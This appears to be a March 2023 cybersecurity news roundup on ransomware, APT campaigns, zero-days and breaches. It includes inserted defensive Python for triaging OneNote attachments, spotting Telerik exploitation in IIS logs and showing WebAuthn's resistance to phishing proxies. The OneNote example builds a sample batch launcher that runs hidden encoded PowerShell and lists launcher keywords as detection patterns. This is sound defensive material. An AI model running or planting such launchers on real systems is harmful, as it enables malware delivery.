    Group-IB security researchers have discovered over 2400 scam pages that target Arabic-speaking job seekers in 13 countries between January 2022 and January 2023. Cybercriminals have created fake job listings and websites to target job seekers and steal personal information. Firms based in Egypt, Saudi Arabia, and Algeria are the most impersonated by scammers. The new scam campaign targets over 40 well-known brands from 13 countries in the MEA region, with the majority of scam pages impersonating companies in the logistics sector (64%), followed by the food and beverage sector (20%), and the petroleum industry (12%). The scheme involves an initial phishing attempt that guides victims to fake web pages with a similar job vacancy description.

    Google Suspends Chinese App Following Malware Discovery

    Google suspended popular budget e-commerce application Pinduoduo from the Play Store after detecting malware in versions of the Chinese app downloadable from other app stores. In a statement on Tuesday, Google said it took action to block the installation of Pinduoduo on Android devices and that it would scan smartphones for malicious versions through its Google Play Protect service. Google's action hasn't stopped Android app stores run by Huawei, Xiaomi and others from offering the app, reported the South China Morning Post. Google Play is blocked in China.

    New 'Bad Magic' Cyber Threat Disrupts Ukraine's Key Sectors Amid War

    Cybersecurity firm Kaspersky has uncovered a new campaign dubbed Bad Magic that targets government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea. First spotted in October 2022, the attack chain starts with a booby-trapped URL pointing to a ZIP archive hosted on a malicious web server. The archive contains a decoy document and a malicious LNK file that, when launched, deploys a backdoor dubbed PowerMagic.

    BreachForums Administrator Baphomet Shuts Down Infamous Hacking Forum

    On March 15, 2023, law enforcement arrested 21-year-old Conor Brian Fitzpatrick (aka “Pompompurin”), the administrator of BreachForums, an infamous underground forum known for hosting stolen databases belonging to numerous companies, often including sensitive information. Fitzpatrick was released a day later on a $300,000 bond signed by his parents and is scheduled to appear for a hearing on March 24, 2023 before the District Court for the Eastern District of Virginia. Following the arrest, Baphomet, the current administrator, posted an update on March 21, 2023 stating that they had decided to take down the forum, while emphasizing “this is not the end.” The takedown is suspected to have been prompted by suspicions that law enforcement may have obtained access to the site’s configuration, source code, and information about the forum’s users.

    PoC Exploits Released for Netgear Orbi Router Vulnerabilities

    Proof-of-concept exploits for vulnerabilities in Netgear’s Orbi 750 series router and extender satellites have been released, one of them for a critical-severity remote command execution bug. Netgear Orbi is a popular mesh network system for home users, providing strong coverage and high throughput for up to 40 simultaneously connected devices across spaces of between 5,000 and 12,500 square feet.

    Mispadu Banking Trojan Targets Latin America: 90,000+ Credentials Stolen

    A banking trojan dubbed Mispadu has been linked to multiple spam campaigns targeting countries like Bolivia, Chile, Mexico, Peru, and Portugal with the goal of stealing credentials and delivering other payloads. The activity, which commenced in August 2022, is currently ongoing, Ocelot Team from Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Mispadu (aka URSA) was first documented by ESET in November 2019, describing its ability to perpetrate monetary and credential theft and act as a backdoor by taking screenshots and capturing keystrokes.

    Ferrari discloses data breach after receiving ransom demand

    Italian luxury sports car maker Ferrari recently disclosed a data breach after attackers gained access to some of its IT systems. The company stated that certain data relating to its clients was exposed, including names, addresses, email addresses and telephone numbers. Based on investigations conducted so far, Ferrari has found no evidence that payment details, bank account numbers or other sensitive payment information were stolen. Since learning of the breach, the company has engaged the relevant authorities to investigate the full scope of the attack.

    Clop Ransomware Claims Saks Fifth Avenue, Retailer Says Mock Data Stolen

    The Clop ransomware gang has claimed responsibility for yet another cyberattack, this time against luxury retailer Saks Fifth Avenue. Founded in 1867 by Andrew Saks and headquartered in New York City, Saks Fifth Avenue remains a notable luxury retailer serving the U.S., Canada, and parts of the Middle East. The ransomware group claims to have stolen sensitive data during the attack, but Saks has stated that the data is only mock data and that no actual customer data was compromised. The retailer has not yet disclosed whether the threat actors obtained employee or corporate data, and no details have been released about any ongoing ransom negotiations.

    Hackers Mostly Targeted Microsoft, Google, Apple Zero-days in 2022

    Hackers continue to target zero-day vulnerabilities in malicious campaigns, with researchers reporting that 55 zero-days were actively exploited in 2022, most targeting Microsoft, Google, and Apple products. Most of these vulnerabilities (53 out of 55) enabled the attacker to either gain elevated privileges or perform remote code execution on vulnerable devices.

    Hitachi Energy Confirms Data Breach After Clop GoAnywhere Attacks

    Hitachi Energy, a subsidiary of the Japanese multinational conglomerate Hitachi, has confirmed a data breach after being hit by the Clop ransomware group's GoAnywhere attacks. Hitachi Energy is an engineering and technology business with an annual revenue of about 10 billion. The attack resulted in the theft of sensitive data from several business units in the United States, Thailand, and Japan.

    Alleged BreachForums Owner Pompompurin Arrested on Cybercrime Charges

    U.S. law enforcement on Wednesday arrested a New York man believed to be Pompompurin, the owner of the BreachForums hacking forum. According to court documents, he was charged with one count of conspiracy to solicit individuals to sell unauthorized access devices. During the arrest, the defendant allegedly admitted that his real name was Conor Brian Fitzpatrick and that he was Pompompurin, the owner of the BreachForums cybercrime forum.

    Emotet Malware Now Distributed in Microsoft OneNote Files to Evade Defenses

    The Emotet malware is now distributed using Microsoft OneNote email attachments, aiming to bypass Microsoft security restrictions and infect more targets. Emotet is a notorious malware botnet historically distributed through Microsoft Word and Excel attachments that contain malicious macros. If a user opens the attachment and enables macros, a DLL will be downloaded and executed that installs the Emotet malware on the device. Once loaded, the malware will steal email contacts and email content for use in future spam campaigns. It will also download other payloads that provide initial access to the corporate network. This access is used to conduct cyberattacks against the company, which could include ransomware attacks, data theft, cyber espionage, and extortion.
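    Because a OneNote notebook is not an Office document, the macro controls that blunted the Word and Excel lures do not apply; the payload sits inside the .one file as an embedded file object that the lure asks the user to double-click. The extractor below is added here as an illustration and is not from the Emotet analysis it accompanies: it walks a .one file for FileDataStoreObject structures by their fixed GUID, pulls out each payload, and flags executables and script launchers. The notebook bytes are constructed for the example.

```python
import struct
from typing import List, Tuple

# Every file embedded in a .one notebook sits in a FileDataStoreObject (MS-ONESTORE).
# The object is located by its fixed GUID and laid out as:
#   guidHeader (16) | cbLength (8, little-endian) | unused (4) | reserved (8) | FileData
FILE_DATA_STORE_GUID = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")
HEADER_LEN = 16 + 8 + 4 + 8

# Content types that have no business inside a notebook that arrived by e-mail.
SUSPICIOUS_MAGIC = [
    (b"MZ", "PE executable (EXE/DLL)"),
    (b"MSCF", "CAB archive"),
    (b"PK\x03\x04", "ZIP/OOXML container"),
    (b"#!", "script with shebang"),
]
SCRIPT_MARKERS = (b"powershell", b"cmd.exe", b"wscript", b"mshta", b"rundll32")


def extract_embedded_files(one_bytes: bytes) -> List[bytes]:
    """Return the raw FileData of every FileDataStoreObject found in the blob."""
    found = []
    pos = one_bytes.find(FILE_DATA_STORE_GUID)
    while pos != -1:
        if pos + HEADER_LEN > len(one_bytes):
            break
        (length,) = struct.unpack_from("<Q", one_bytes, pos + 16)
        start, end = pos + HEADER_LEN, pos + HEADER_LEN + length
        if length == 0 or end > len(one_bytes):
            break  # truncated or corrupt object: stop rather than read past the file
        found.append(one_bytes[start:end])
        pos = one_bytes.find(FILE_DATA_STORE_GUID, end)
    return found


def classify(data: bytes) -> str:
    for magic, label in SUSPICIOUS_MAGIC:
        if data.startswith(magic):
            return label
    head = data[:256].lower()
    if any(marker in head for marker in SCRIPT_MARKERS):
        return "script/launcher text"
    return "unclassified"


def triage(one_bytes: bytes) -> List[Tuple[int, str]]:
    """(size, verdict) per embedded file; anything other than 'unclassified' deserves a look."""
    return [(len(d), classify(d)) for d in extract_embedded_files(one_bytes)]


def _file_object(payload: bytes) -> bytes:
    return (FILE_DATA_STORE_GUID + struct.pack("<Q", len(payload))
            + b"\x00" * 4 + b"\x00" * 8 + payload)


def sample_notebook() -> bytes:
    """Constructed stand-in for a malicious .one with two embedded objects behind a 'click to view' overlay."""
    dropper = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"                      # PE-looking stub
    launcher = b"@echo off\r\nstart /min powershell -w hidden -enc QQBB\r\n"    # batch launcher
    return b"\x00" * 32 + _file_object(dropper) + b"\x11" * 16 + _file_object(launcher) + b"\x00" * 8


if __name__ == "__main__":
    for size, verdict in triage(sample_notebook()):
        print(f"{size:6d} bytes  {verdict}")
```

    Run against real samples this is a first pass only: payloads are often renamed (.wsf, .vbs, .hta, .lnk) and may be wrapped in a second container, so the extracted bytes should go to the same file-type and sandbox pipeline as any other attachment.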

    Chinese Hackers Targeting Security and Network Appliances

    Chinese threat actors are turning security appliances into penetration pathways, forcing firewall maker Fortinet to again attempt to fend off hackers with a patch. Researchers from Mandiant say suspected Beijing-backed hackers it tracks as UNC3886 have been targeting firewall and virtualization appliances. The group, Mandiant said in a Thursday blog post, exploited a now-patched path traversal zero-day vulnerability tracked as CVE-2022-41328 in the Fortinet operating system in order to gain persistence on FortiGate and FortiManager products. Such penetrations can give hackers years of uninterrupted access to internal networks. A threat cluster related to UNC3886 also targeted a Fortinet zero-day in a campaign that involved delivery of a custom backdoor “specifically designed to run on FortiGate firewalls.”

    Adobe Acrobat Sign Abused to Push Redline Info-Stealing Malware

    Cybercriminals are abusing the Adobe Acrobat Sign service to distribute Redline malware, a powerful information-stealing Trojan. Adobe Acrobat Sign is a cloud-based e-signature service that enables users to create, send, track, and manage electronic signatures. It is a free-to-try service that allows users to sign documents securely and remotely without physical paperwork. Avast researchers observed threat actors sending phishing emails to trick victims into opening malicious PDF documents.

    Conti-Based Ransomware ‘Meowcorp’ Gets Free Decryptor

    A decryption tool for a modified version of the Conti ransomware could help hundreds of victims recover their files for free. The utility works with data encrypted by a strain of the ransomware that emerged after the source code for Conti was leaked in March last year. Researchers at cybersecurity company Kaspersky found the leak on a forum where the threat actors released a cache of 258 private keys from a modified version of the Conti ransomware.

    Fortinet Zero-Day Attacks Linked to Suspected Chinese Hackers

    A suspected Chinese hacking group has been linked to a series of attacks on government organizations exploiting a Fortinet zero-day vulnerability (CVE-2022-41328) to deploy malware. The security flaw allowed threat actors to deploy malware payloads by executing unauthorized code or commands on unpatched FortiGate firewall devices, as Fortinet disclosed last week. Further analysis revealed that the attackers could use the malware for cyber-espionage, including data exfiltration, downloading and writing files on compromised devices, or opening remote shells when receiving maliciously crafted ICMP packets.

    Russia May Be Reviving Cyber Ops Ahead of Spring Offensive

    British intelligence reports that since early in January, the Russian military appears to have been "attempting to restart major operations" with a focus on capturing "the remaining Ukrainian-held parts of Donetsk Oblast," a territory the size of Massachusetts located in the eastern part of the country. In new analysis, Microsoft reports Russia in recent months appears to have increased cyberespionage efforts aimed at nations helping with the defense of Ukraine, mostly governments of European nations. Based on a recent flurry of activity by Russia, Microsoft foresees an uptick in ransomware, an emphasis on obtaining initial access to systems, and increased influence operations.

    BianLian Ransomware Gang Shifts Focus to Pure Data Extortion

    The BianLian ransomware group has shifted its focus from encrypting its victims' files to only exfiltrating data found on compromised networks and using it for extortion. This operational change was reported by cybersecurity company Redacted, which has seen signs of the threat group attempting to hone its extortion techniques and increase the pressure on its victims.

    US Federal Agency Hacked Using Old Telerik Bug to Steal Data

    Last year, a U.S. federal agency's Microsoft Internet Information Services (IIS) web server was hacked by exploiting a critical .NET deserialization vulnerability in the Progress Telerik UI for ASP.NET AJAX component. According to a joint advisory issued today by CISA, the FBI, and MS-ISAC, the attackers had access to the server between November 2022 and early January 2023, based on indicators of compromise (IOCs) found on the unnamed federal civilian executive branch (FCEB) agency's network.
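    The advisory concerns CVE-2019-18935, a deserialization flaw in Telerik's RadAsyncUpload handler; exploitation shows up in IIS logs as POST requests to Telerik.Web.UI.WebResource.axd?type=rau, and the uploaded DLLs land in C:\Windows\Temp under Unix-timestamp names. The detection below is added here as an example and is not CISA's or the FBI's tooling; the log lines and IP addresses are constructed.

```python
import re
from typing import Dict, List

# The RadAsyncUpload handler abused by the CVE-2019-18935 deserialization chain.
TELERIK_HANDLER = "telerik.web.ui.webresource.axd"
# Uploaded payloads are written to C:\Windows\Temp named after a Unix timestamp, e.g. 1667912345.1234.dll
EPOCH_DLL_RE = re.compile(r"^\d{9,10}(?:\.\d+)?\.dll$", re.IGNORECASE)


def parse_iis_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C extended log text using its own '#Fields:' header to name the columns."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def telerik_rau_posts(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """POSTs to the RadAsyncUpload handler: the request shape the exploit uses."""
    hits = []
    for r in rows:
        stem = r.get("cs-uri-stem", "").lower()
        query = r.get("cs-uri-query", "").lower()
        if (r.get("cs-method", "").upper() == "POST"
                and stem.endswith(TELERIK_HANDLER)
                and "type=rau" in query):
            hits.append(r)
    return hits


def sources_by_count(hits: List[Dict[str, str]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.get("c-ip", "?")] = counts.get(h.get("c-ip", "?"), 0) + 1
    return counts


def is_epoch_named_dll(filename: str) -> bool:
    """True for the timestamp-named DLLs the advisory describes in C:\\Windows\\Temp."""
    return bool(EPOCH_DLL_RE.match(filename))


# Constructed IIS log excerpt (documentation IP ranges; User-Agent spaces are '+' as IIS writes them).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2022-11-14 03:12:41 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 203.0.113.9 python-requests/2.28.1 200
2022-11-14 03:12:45 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=rau 443 198.51.100.2 Mozilla/5.0+(Windows+NT+10.0) 200
2022-11-14 03:13:02 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 203.0.113.9 python-requests/2.28.1 500
2022-11-14 03:13:10 10.0.0.5 GET /Default.aspx - 443 198.51.100.2 Mozilla/5.0+(Windows+NT+10.0) 200
"""

if __name__ == "__main__":
    hits = telerik_rau_posts(parse_iis_w3c(SAMPLE_LOG))
    print(sources_by_count(hits))
```

    Legitimate RadAsyncUpload traffic also POSTs to this handler, so the signal is the combination: a source that is not a normal user population, a non-browser User-Agent, a burst of 500s while the attacker tunes the payload, and timestamp-named DLLs appearing in the temp directory in the same window.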

    CISA Warns of Adobe ColdFusion Bug Exploited as a Zero-Day

    CISA recently added a critical bug to its Known Exploited Vulnerabilities catalog. Tracked as CVE-2023-26360, the vulnerability is an improper access control issue impacting Adobe ColdFusion 2021 (Update 5 and earlier) and ColdFusion 2018 (Update 15 and earlier). Successful exploitation could enable actors to elevate their privileges, access sensitive information, and even execute arbitrary code remotely. The vulnerability is fixed in ColdFusion 2018 Update 16 and ColdFusion 2021 Update 6. Given the severity of the flaw, CISA is giving federal agencies three weeks, until April 5, to apply the security updates.

    Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Vulnerabilities

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow a remote attacker to bypass authentication or execute arbitrary commands on the underlying operating system of an affected device. Cisco's advisory states that one of the flaws in the RV016, RV042, RV042G, and RV082 Routers "could allow an unauthenticated, remote attacker to bypass authentication on an affected device." Cisco has said it will not release software updates for these end-of-life models, so disabling remote management on the WAN interface or replacing the devices is the available mitigation.

    Winter Vivern APT hackers Use Fake Antivirus Scans to Install Malware

    An advanced hacking group named 'Winter Vivern' targets European government organizations and telecommunication service providers to conduct espionage. The group's activities align with the interests of the Russian and Belarusian governments, so it is believed to be a pro-Russian APT (advanced persistent threat) group. SentinelLabs reports that the threat group operates with limited resources; however, its creativity compensates for those limitations.

    Veeam Backup & Replication CVE-2023-27532 Exploit Created

    On 7 March 2023, Veeam published a knowledge base article outlining CVE-2023-27532, a vulnerability in the Veeam Backup & Replication component that allows an unauthenticated user to retrieve host credentials stored in the configuration database. This weakness could ultimately enable an attacker to gain access to hosts and devices managed by the Veeam Backup server. With access to the open TCP port 9401, any individual could obtain credentials and potentially move laterally throughout the network with the newly exposed usernames and passwords.

    US SEC Amps Up Regulatory Proposals for Market Cybersecurity

    The Securities and Exchange Commission proposed a slew of new cybersecurity rules for the companies underpinning the U.S. stock market, the latest sign of increasing unhappiness among Biden administration officials about the private sector's management of digital risk. The commission approved a proposal that would place market entities under a mandate to report significant cybersecurity incidents to the agency after having concluded with "reasonable basis" that the incident occurred, or even is still in progress.

    Yorotrooper Cyberspies Target CIS Energy Orgs, EU Embassies

    According to researchers, a new espionage group dubbed YoroTrooper is targeting European Union embassies, Central Asian diplomatic organizations, and energy companies in Ukraine and Kazakhstan. The threat actors access victims' networks through phishing emails containing malicious LNK attachments and decoy PDF documents. Researchers at Cisco Talos observed YoroTrooper exfiltrating significant amounts of data from infected endpoints, along with credentials, cookies, and browsing histories. "While YoroTrooper uses malware associated with other threat actors, such as PoetRAT and LodaRAT, Cisco's analysts have enough indications to believe this is a new cluster of activity."

    Rubrik Confirms Data Theft in GoAnywhere Zero-Day Attack

    Cybersecurity company Rubrik has confirmed that its data was stolen using a zero-day vulnerability in the Fortra GoAnywhere secure file transfer platform. Rubrik is a cloud data management service that offers enterprise data backup and recovery services and disaster recovery solutions. In a statement from Rubrik CISO Michael Mestrovich, the company disclosed that it was a victim of a large-scale attack against GoAnywhere MFT devices worldwide using a zero-day vulnerability.

    US CISA to Warn Critical Infrastructure of Ransomware Risk

    The top U.S. cybersecurity agency says it is testing scanning of critical infrastructure organizations to detect vulnerabilities exploitable by ransomware actors, so that they can be patched before extortionists find them. Congress directed the Cybersecurity and Infrastructure Security Agency to conduct a pilot scanning for ransomware vulnerabilities in legislation that became law last March. The Ransomware Vulnerability Warning Pilot became active on Jan. 30.

    Exfiltration Malware Takes Center Stage in Cybersecurity Concerns

    SpyCloud has released their 2023 Annual Identity Exposure Report. The report identified over 22 million unique devices infected by malware last year. Of the 721.5 million exposed credentials recovered by SpyCloud, roughly 50% came from botnets, tools commonly used to deploy highly accurate information-stealing malware. The researchers warn of a distinctive spike in malware designed to exfiltrate data directly from devices and browsers, which has led to continued user exposure.

    Critical Patches Issued for Microsoft Products

    Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

    CISA Now Warns Critical Infrastructure of Ransomware-Vulnerable Devices

    Ransomware continues to be a pertinent threat to critical infrastructure, with actors leveraging known vulnerabilities to target organizations across the globe. As a countermeasure, CISA has announced a new pilot program to help critical infrastructure entities protect their information systems from ransomware attacks. The program, dubbed the “Ransomware Vulnerability Warning Pilot” (RVWP) and started on January 30, 2023, will help organizations identify vulnerabilities in their systems that might be exploited by ransomware threat actors.

    DEV-1101 Enables High-volume AiTM Campaigns with Open-source Phishing Kit

    Adversary-in-the-middle (AiTM) phishing kits are part of an increasing trend that is observed supplanting many other less advanced forms of phishing. AiTM phishing is capable of circumventing multifactor authentication (MFA) through reverse-proxy functionality. DEV-1101 is an actor tracked by Microsoft responsible for the development, support, and advertising of several AiTM phishing kits, which other cybercriminals can buy or rent. The availability of such phishing kits for purchase by attackers is part of the industrialization of the cybercriminal economy and lowers the barrier of entry for cybercrime.
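    What a reverse-proxy kit cannot relay is an assertion bound to the origin the browser is really on, which is why phishing-resistant MFA (FIDO2/WebAuthn) is the standard counter to AiTM. The simulation below is added here and is not Microsoft's or DEV-1101's code: it runs the relying-party checks on clientDataJSON and authenticatorData for a legitimate login and for the same login relayed through a look-alike proxy host. The origins, the rpId, and the omission of the signature check (which needs the credential's public key) are assumptions for the example.

```python
import base64
import hashlib
import json
import os
from typing import Tuple

RP_ID = "example.com"                             # assumed relying-party ID
LEGIT_ORIGIN = "https://login.example.com"        # assumed genuine sign-in origin
PHISH_ORIGIN = "https://login.example-com.net"    # assumed AiTM proxy host (constructed)


def _b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).decode().rstrip("=")


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def browser_client_data(page_origin: str, challenge: bytes) -> bytes:
    """The browser, not the page, writes clientDataJSON; 'origin' is where the user actually is."""
    return json.dumps({"type": "webauthn.get",
                       "challenge": _b64url(challenge),
                       "origin": page_origin}).encode()


def authenticator_data(rp_id: str) -> bytes:
    """authData prefix: SHA-256(rpId) | flags (UP|UV) | 32-bit signature counter."""
    return hashlib.sha256(rp_id.encode()).digest() + b"\x05" + (1).to_bytes(4, "big")


def rp_verify(client_data: bytes, auth_data: bytes, expected_origin: str,
              rp_id: str, challenge: bytes) -> Tuple[bool, str]:
    """Relying-party checks from the WebAuthn assertion ceremony (signature verification omitted)."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if _b64url_decode(cd.get("challenge", "")) != challenge:
        return False, "challenge mismatch (replayed or foreign assertion)"
    if cd.get("origin") != expected_origin:
        return False, f"origin {cd.get('origin')!r} is not {expected_origin!r}"
    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash does not match"
    if not auth_data[32] & 0x01:
        return False, "user presence not asserted"
    return True, "ok"


def simulate_login(page_origin: str) -> Tuple[bool, str]:
    """The victim's browser is on `page_origin`; a proxy, if present, relays bytes unchanged to the RP."""
    challenge = os.urandom(32)                          # issued by the RP, relayed by the proxy
    client_data = browser_client_data(page_origin, challenge)
    auth_data = authenticator_data(RP_ID)
    # The proxy cannot rewrite client_data on the way back: the authenticator signs
    # authData || SHA-256(clientDataJSON), so any edit invalidates the assertion.
    return rp_verify(client_data, auth_data, LEGIT_ORIGIN, RP_ID, challenge)


if __name__ == "__main__":
    print("direct:", simulate_login(LEGIT_ORIGIN))
    print("via proxy:", simulate_login(PHISH_ORIGIN))
```

    In a real browser the ceremony fails even earlier, because example.com is not a registrable suffix of the proxy's domain and the credential is never offered; the origin check shown here is the server-side backstop. A TOTP code or push approval has no such binding, which is exactly what the relay exploits.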

    North Korean Hackers Find Value in LinkedIn

    Business social media platform LinkedIn continues to pay dividends for North Korean hackers, including one group historically concentrated on South Korean targets that has expanded into pursuing security researchers and media industry workers in the West. A Pyongyang group tracked by Google threat intelligence unit Mandiant as UNC2970 masquerades as recruiters on LinkedIn in a bid to entice victims into opening a phishing payload disguised as a job description or skills assessment.

    Cybersecurity Poised for Spending Boost in Biden Budget

    The Biden administration's spending blueprint for the coming federal fiscal year includes increased funding for cybersecurity at federal agencies and for Ukraine. The $1.7 trillion proposal for discretionary federal spending starting Oct. 1 includes $753 million in assistance for Ukraine. The money would be used by Kyiv to "counter Russian malign influence and to meet emerging needs related to security, energy, cybersecurity, disinformation, macroeconomic stabilization, and civil society resilience," a White House budget overview states. Additional budget documents containing more detail are set for release on Monday.

    Medusa Ransomware Gang Picks up Steam as It Targets Companies Worldwide

    The Medusa ransomware gang is gaining momentum as it targets companies worldwide. The group first emerged in 2021 and has been observed utilizing a variety of tactics to compromise organizations, including phishing emails, exploiting vulnerable remote desktop services, and exploiting vulnerabilities in software. Bleeping Computer has analyzed Medusa's encryptor for Windows, but it is not clear whether the group also has an encryptor for Linux. The Windows encryptor has command-line options that enable the attackers to customize how files get encrypted on infected devices. Additionally, the ransomware terminates over 280 Windows services and processes to prevent interference with file encryption, including services for mail servers, database servers, backup servers, and security software.

    KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets

    The Dark Pink advanced persistent threat (APT) actor has been linked to a fresh set of attacks targeting government and military entities in Southeast Asian countries with a malware called KamiKakaBot. Dark Pink, also called Saaiwc, was extensively profiled by Group-IB earlier this year, describing its use of custom tools such as TelePowerBot and KamiKakaBot to run arbitrary commands and exfiltrate sensitive information.

    Clop Ransomware Gang Begins Extorting GoAnywhere Zero-Day Victims

    The Clop ransomware gang has begun extorting companies whose data was stolen using a zero-day vulnerability in the Fortra GoAnywhere MFT secure file-sharing solution. In February, the GoAnywhere MFT file transfer solution developers warned customers that a zero-day remote code execution vulnerability was being exploited on exposed administrative consoles. GoAnywhere is a secure web file transfer solution that allows companies to securely transfer encrypted files with their partners while keeping detailed audit logs of who accessed the files.

    Xenomorph Android Malware Now Steals Data From 400 Banks

    The Xenomorph Android malware has upgraded with new capabilities, including an automated transfer system framework and the ability to steal login credentials from 400 banks. The malware was first discovered on the Google Play store in February 2022 with over 50,000 downloads. The latest version of the malware targets financial institutions in the United States, Spain, Turkey, Poland, Australia, Canada, Italy, Portugal, France, Germany, UAE, and India. "Some examples of targeted institutions include Chase, Citibank, American Express, ING, HSBC, Deutsche Bank, Wells Fargo, Amex, Citi, BNP, UniCredit, National Bank of Canada, BBVA, Santander, and Caixa. The list is too extensive to include here, but ThreatFabric has listed all targeted banks in the appendix of its report." Moreover, the malware targets 13 cryptocurrency wallets, including Binance, BitPay, KuCoin, Gemini, and Coinbase.

    Internet Crime in 2022: Over $3 Billion Lost to Investment Scammers

    “In 2022, investment scam losses were the most (common or dollar amount) scheme reported to the Internet Crime Complaint Center (IC3),” the FBI shared in its 2022 Internet Crime Report. This category includes crypto-investment scams such as liquidity mining, celebrity impersonation, “pig butchering,” and many more. Business email compromise (BEC) scams are the second most financially destructive overall, followed by tech support scams and personal data breaches.

    Alleged Seller of Netwire RAT Arrested in Croatia

    This week, as part of a global law enforcement operation, federal authorities in Los Angeles successfully confiscated www[.]worldwiredlabs[.]com, a domain utilized by cybercriminals to distribute the NetWire remote access trojan (RAT), which allowed perpetrators to assume control of infected computers and extract a diverse range of sensitive information from their unsuspecting victims.

    Microsoft: Business Email Compromise Attacks Can Take Just Hours

    Microsoft’s Security Intelligence team recently investigated a business email compromise (BEC) attack and found that attackers move rapidly, with some steps taking mere minutes. The whole process, from signing in using compromised credentials to registering typosquatting domains and hijacking an email thread, took the threat actors only a couple of hours. This rapid attack progression ensures that the targets will have minimal opportunity to identify signs of fraud and take preventive measures.

    SonicWall SMA Appliance Infected by a Custom Malware Allegedly Developed by Chinese Hacker

    Mandiant researchers reported that alleged China-linked threat actors, tracked as UNC4540, deployed custom malware on a SonicWall SMA appliance. The malware allows attackers to steal user credentials, achieve persistence across firmware upgrades, and gain shell access. The compromised device contained a set of files used by the attacker to gain highly privileged access to the appliance. The code itself consisted of a variety of bash scripts and a single ELF binary identified as a TinyShell variant.

    Fortinet Plugs Critical RCE Hole in FortiOS, FortiProxy (CVE-2023-25610)

    Fortinet has patched 15 vulnerabilities in a variety of its products, including CVE-2023-25610, a critical flaw affecting devices running FortiOS and FortiProxy. None of the patched vulnerabilities is actively exploited, but Fortinet’s devices are often targeted by ransomware gangs and other cyber attackers, so implementing the offered security updates quickly is advised. Discovered by Fortinet infosec engineer Kai Ni, CVE-2023-25610 is a buffer underwrite (‘buffer underflow’) vulnerability found in the FortiOS and FortiProxy administrative interface. Linux-based FortiOS powers many of Fortinet’s products, including its FortiGate firewalls and various switches. FortiProxy is a secure web proxy that protects users against internet-borne attacks.

    Fake ChatGPT Chrome Extension Targeted Facebook Ad Accounts

    ChatGPT has garnered a lot of questions about its security and capacity for manipulation, partly because it is new software that has seen unprecedented growth (hosting 100 million users just two months after its launch). Security concerns vary from the risk of data breaches to the program writing code on behalf of hackers. The fake ChatGPT extension discovered by Guardio is the latest security concern, affecting thousands daily; its cycle runs from malvertising to extension installation, hijacking of Facebook accounts, and back again to propagation. The scam starts with the malicious stealer extension, “Quick access to Chat GPT,” showing up in Facebook-sponsored posts as a quick way to get started with ChatGPT directly from your browser.

    FBI Investigates Data Breach Impacting U.S. House Members and Staff

    The FBI is investigating a data breach that has affected US House members and staff. Hackers have gained sensitive personal information from the servers of DC Health Link, which administers health plans. The US House Chief Administrative Officer notified impacted individuals via email. The email stated that "DC Health Link suffered a significant data breach yesterday potentially exposing the Personal Identifiable Information (PII) of thousands of enrollees. As a Member or employee eligible for health insurance through D.C. Health Link, your data may have been compromised" (Bleeping Computer, 2023). The scope and severity of the breach are currently unclear, and it does not appear that Members or the House of Representatives were the specific targets of the attack.

    QR Codes: A Growing Vulnerability to Cybercrimes

    QR codes are increasingly being used by cybercriminals in attacks. “Invented in the 1990s, QR codes surged during the pandemic. They offered a way for people to access information and conduct activities in a touchless way.” Insider Intelligence reports that the number of US smartphone users scanning a QR code will increase from 83.4 million in 2022 to 99.5 million in 2025.

    IceFire Ransomware Now Encrypts Both Linux and Windows Systems

    Threat actors linked to the IceFire ransomware operation now actively target Linux systems worldwide with a new dedicated encryptor. SentinelLabs security researchers found that the gang has breached the networks of several media and entertainment organizations around the world in recent weeks, starting mid-February.

    Emotet Malware Attacks Return After Three-Month Break

    Emotet, a notorious malware active since 2014, has resumed its attacks after a three-month break. The malware is primarily distributed through phishing emails containing Microsoft Word and Excel document attachments. Once installed, it harvests victims' emails and contacts for use in future Emotet campaigns or downloads additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.

    US Senators Aim to Block Foreign Tech that Poses Threat

    A dozen U.S. senators on Tuesday introduced bipartisan legislation backed by the White House charging the federal government with initiating a process to systematically block foreign technology from reaching the domestic market when the tech poses a national security threat. Backers say the bill, the Restricting the Emergence of Security Threats that Risk Information Communications Technology Act, could result in restrictions for the social media platform TikTok, which is owned by Chinese company ByteDance. The short form video app has operated under a cloud of Washington, D.C.-driven opposition dating to fears by the Trump administration that TikTok shares data with the Chinese government and could be used in Beijing influence operations.

    New HiatusRAT Router Malware Covertly Spies On Victims

    This campaign is significantly smaller than some of the more prominent botnets such as Emotet or Chaos – both of which indiscriminately target vulnerable devices on the internet. It's been assessed that the threat actor most likely chose to keep the campaign small to evade detection: "As of mid-February 2023, there were approximately 2,700 DrayTek Vigor 2960 routers and approximately 1,400 DrayTek Vigor 3900 routers exposed on the internet, and Hiatus had compromised approximately 100 of these routers."

